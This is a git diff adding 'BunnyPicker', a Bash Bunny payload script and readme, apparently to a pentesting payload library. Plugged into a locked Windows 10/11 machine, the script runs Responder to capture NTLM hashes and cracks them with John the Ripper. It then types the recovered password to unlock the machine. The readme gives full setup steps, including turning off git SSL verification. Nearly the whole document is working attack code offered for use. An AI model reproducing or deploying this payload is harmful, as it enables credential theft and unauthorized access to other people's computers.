diff --git a/payloads/library/credentials/BunnyPicker/payload.txt b/payloads/library/credentials/BunnyPicker/payload.txt new file mode 100644 index 000000000..f2834aab8 --- /dev/null +++ b/payloads/library/credentials/BunnyPicker/payload.txt @@ -0,0 +1,111 @@ +#!/bin/bash +# +#Author: rf_bandit +#Version: Version 1.0 +#Credit: Hak5Darren, Mubix, catatonic, mame82 +#Firmware: 1.7 +#Date: May 2023 +# +# Options +RESPONDER_OPTIONS="-w -r -d -P" +LOOTDIR=/root/udisk/loot/bunnypicker +WORDFILE= +#eg /tools/john/password.lst +# or install via tools folding in arming mode (/tools/) +PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION + +# Check for responder and john +REQUIRETOOL responder +REQUIRETOOL john + +# Setup Attack +LED SETUP + +# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET +ATTACKMODE HID RNDIS_ETHERNET +#ATTACKMODE ECM_ETHERNET + +# Set convenience variables +GET TARGET_HOSTNAME +GET TARGET_IP + +# Setup named logs in loot directory +mkdir -p $LOOTDIR +HOST=${TARGET_HOSTNAME} +# If hostname is blank set it to "noname" +[[ -z "$HOST" ]] && HOST="noname" +COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) +COUNT=$((COUNT+1)) +mkdir -p $LOOTDIR/$HOST-$COUNT + +# As a backup also copy logs to a loot directory in /root/loot/ +mkdir -p /root/loot/bunnypicker/$HOST-$COUNT + +# Check target IP address. If unset, blink RED and end. +if [ -z "${TARGET_IP}" ]; then + LED FAIL2 + exit 1 +fi + +# Set LED yellow, run attack +LED ATTACK +cd /tools/responder + +# Clean logs directory +rm logs/* + +# Run Responder with specified options +python Responder.py -I usb0 $RESPONDER_OPTIONS & + +# Wait until NTLM log is found +until [ -f logs/*NTLM* ] +do + # Ima just loop here until NTLM logs are found + sleep 1 +done + +# copy logs to loot directory +cp logs/* /root/loot/bunnypicker/$HOST-$COUNT +cp logs/* $LOOTDIR/$HOST-$COUNT + +# Sync USB disk filesystem +sync + +#kill responder +killall python +killall python +killall python + +#Cracking begins! +cd /tools/john +LED STAGE1 +#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second. +#We could go CUCMBER PLAID here but its probably not needed +./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt + + +# Check john.pot If empty blink RED and end. Move to offline attack. +if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then + LED FAIL3 + exit 1 +fi + +#This will copy our cracked password to the loot folder for future use. +LED STAGE2 +awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt +echo -n "STRING " > $PAYLOAD_DIR/pass.txt +cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt + +#This should unlock the machine with our cracked password. +#$PAYLOAD_DIR would not work with QUACK +QUACK ESC +DELAY 100 +QUACK $SWITCH_POSITION/pass.txt +QUACK ENTER +rm $PAYLOAD_DIR/pass.txt + +LED CLEANUP +sync + +# When the light turns green its a hacked machine. +LED FINISH diff --git a/payloads/library/credentials/BunnyPicker/readme.md b/payloads/library/credentials/BunnyPicker/readme.md new file mode 100644 index 000000000..962a15118 --- /dev/null +++ b/payloads/library/credentials/BunnyPicker/readme.md @@ -0,0 +1,117 @@ +# Bunnypicker (Win10 Lockpicker for Bash Bunny) +.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______ +| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \ +| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) | +| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | / +| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----. +|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____| + , + /| __ + / | ,-~ / + Y :| // / + | jj /( .^ + >-"~"-v" + / Y + jo o | + ( ~T~ j + >._-' _./ + / "~" | + Y _, | + /| ;-"~ _ l +/ l/ ,-"~ \ +\//\/ .- \ + Y / Y -Row + l I ! + ]\ _\ /"\ +(" ~----( ~ Y. ) +~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +Author: rf_bandit +Version: Version 1.0 +Credit: Hak5Darren, Mubix, catatonic, mame82 +Firmware: 1.7 +Target: Windows 10/11 +Date: May 2023 + +## Description +This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1) +Snags credentials from locked machines +Implements a responder attack. Saves creds to the loot folder on the USB Disk +Looks for *NTLM* log files +Cracks hash with John the Ripper. Best with a smaller dictionary. +Saves cracked hash to loot folder +Quacks password and unlocks machine + +On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash. +If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network. +We can run through 100K simple passwords in 1 second. +Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock. + + + +## Configuration +. +Configured for Windows. Not tested on Mac/*nix +The path to the wordfile needs to be configured, eg /tools/ or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst. + + +## Requirements + +Responder must be in /tools/responder/ +(Can be otained from https://forums.hak5.org/topic/40971-info-tools/) +JtR must be in /tools/john +Requires initial setup (below) + +## Initial Setup +Install responder from https://forums.hak5.org/topic/40971-info-tools/ + +Replace /etc/apt/sources.list with: +deb http://archive.debian.org/debian/ jessie main non-free contrib +deb-src http://archive.debian.org/debian/ jessie main non-free contrib +deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib +deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib + +apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.) + +The john package included can't handle NTLM hashes so we will make our own. +Install gcc and git if you don't have them. + +apt-get install gcc + +apt-get install git +git config --global http.sslverify "false" (this is insecure but I'm not worried) + +git clone https://github.com/openwall/john + +cd john +./configure && make +mv run /tools/john +cd .. +rm -r john (not required but a space saving measure) + + +## STATUS + + +| Status | Description | +| ------------------- | ---------------------------------------- | +| LED SETUP | Starting | +| LED ATTACK | Grabbing creds | +| LED STAGE1 | Running JtR | +| LED STAGE2 | Unlocking | +| LED CLEANUP | Sync to disk | +| LED FINISH | Trap is clean | +| FAIL1 | Responder not found at /tools/responder | +| FAIL2 | Target did not aquire IP address | +| FAIL3 | Hash not cracked - move to offline attack| + +## ADDITIONAL NOTES + +For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure. +A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst. +Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked +and unlocked machines. + +This was fun to make. Thanks to everyone who put in all the hard work before me. +